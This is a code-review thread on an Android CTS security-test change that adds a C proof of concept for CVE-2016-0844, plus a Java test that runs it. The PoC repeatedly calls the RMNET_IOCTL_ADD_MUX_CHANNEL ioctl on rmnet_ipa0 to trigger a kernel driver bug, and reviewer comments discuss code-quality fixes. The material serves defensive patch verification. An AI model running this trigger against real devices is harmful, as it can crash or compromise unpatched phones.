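Review bot: The first section of this header uses `uint32_t`, `uint16_t` and `uint8_t` from `struct ipa_hdr_tbl_info_type_v01` onward, but the only include ahead of it is `<sys/types.h>`; `<linux/types.h>` is pulled in only in the later `_UAPI_MSM_IPC_H_` section, so the fixed-width names resolve only if `<sys/types.h>` happens to drag in `<stdint.h>` on the target toolchain. Adding `#include <stdint.h>` next to `#include <sys/types.h>` makes the header self-contained. The file concatenates three vendor UAPI headers (IPA QMI, MSM IPC router, RmNet) behind their original guards; a one-line comment at the top naming them as trimmed copies and the kernel tree they came from would help the next maintainer, since the `gid_t group_id[0]` and `srv_info[0]` zero-length arrays are kernel idioms rather than something to "fix" here.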
+++ b/hostsidetests/security/securityPatch/CVE-2016-0844/poc.c 
@@ -0,0 +1,79 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions vand
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <net/if.h>
+#include <net/if_arp.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/prctl.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <time.h>
+#include <unistd.h>
+#include "local_poc.h"
+
+#define WAN_IOC_MAGIC 0x69
+#define WAN_IOCTL_ADD_FLT_RULE 0
+#define WAN_IOCTL_ADD_FLT_INDEX 2
+#define WAN_IOC_ADD_FLT_RULE \
+ _IOWR(WAN_IOC_MAGIC, WAN_IOCTL_ADD_FLT_RULE, \
+ struct ipa_install_fltr_rule_req_msg_v01 *)
+
+#define WAN_IOC_ADD_FLT_RULE_INDEX \
+ _IOWR(WAN_IOC_MAGIC, WAN_IOCTL_ADD_FLT_INDEX, \
+ struct ipa_fltr_installed_notif_req_msg_v01 *)
+
+int trigger(int sfd, char *ifname) {
+ int ret;
+ struct ifreq ifr;
+ unsigned cmd = RMNET_IOCTL_EXTENDED;
+ strlcpy(ifr.ifr_name, ifname, IFNAMSIZ);
+ struct rmnet_ioctl_extended_s extendata;
+ int i;
+ ifr.ifr_ifru.ifru_data = &extendata;
+ extendata.extended_ioctl = RMNET_IOCTL_ADD_MUX_CHANNEL;
+ for (i = 0; i < 3; i++) {
+ extendata.u.rmnet_mux_val.mux_id = rand();
+ printf("[-] call ioctl %d\n", i);
+ if (ioctl(sfd, cmd, &ifr) < 0) {
+ printf("%s, %s\n", __func__, strerror(errno));
+ ret = -1;
+ }
+ }
+
+ return ret;
+}
+
+int main() {
+ int sockfd;
+ char *ifname = "rmnet_ipa0";
+
+ srand(time(NULL));
+
+ if ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
+ printf("socket = %d, %s\n", sockfd, strerror(errno));
+ exit(1);
+ }
+
+ trigger(sockfd, ifname);
+ return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_04.java b/hostsidetests/security/src/android/security/cts/Poc16_04.java
index 5d033751c0a..d3da9357393 100644
--- a/hostsidetests/security/src/android/security/cts/Poc16_04.java
+++ b/hostsidetests/security/src/android/security/cts/Poc16_04.java
@@ -30,4 +30,12 @@ public class Poc16_04 extends SecurityTestCase {
 String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
 assertNotMatches("[\\s\\n\\S]*IOMX_InfoLeak b26323455[\\s\\n\\S]*", logcat);
 }
+
+ /**
+ * b/26324307
+ */
+ @SecurityTest
+ public void testPocCVE_2016_0844() throws Exception {
+ AdbUtils.runPoc("CVE-2016-0844", getDevice(), 60);
+ }
 }
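Review bot: `ret` in `trigger` is assigned only on the ioctl failure path, so when all three ioctls succeed the function returns an uninitialized value; declare it `int ret = 0;`. `ifr` and `extendata` are handed to the kernel with uninitialized bytes as well (only `ifr_name` is written, and `rmnet_mux_val.vchannel_name` is never set), so `struct ifreq ifr = {0};` and `struct rmnet_ioctl_extended_s extendata = {0};` would make each request deterministic instead of dependent on stack contents. `main` discards `trigger`'s return value and never closes `sockfd`; `int main(void)` would also match the prototype style of `trigger`. The license header of both poc.c and local_poc.h reads "governing permissions vand" where the stock Apache text is "permissions and".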
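Review bot: The Javadoc on `testPocCVE_2016_0844` cites only b/26324307, while the commit message tracks both b/72509609 and b/26324307 and the test is named after the CVE; a one-line comment such as `* b/26324307, b/72509609 - CVE-2016-0844, rmnet_ipa0 RMNET_IOCTL_ADD_MUX_CHANNEL ioctl` would let a reader map the test to its PoC without opening poc.c. The test itself only runs the binary with a 60-second timeout, so whatever pass/fail criterion applies presumably lives inside `AdbUtils.runPoc`, which is not visible in this change.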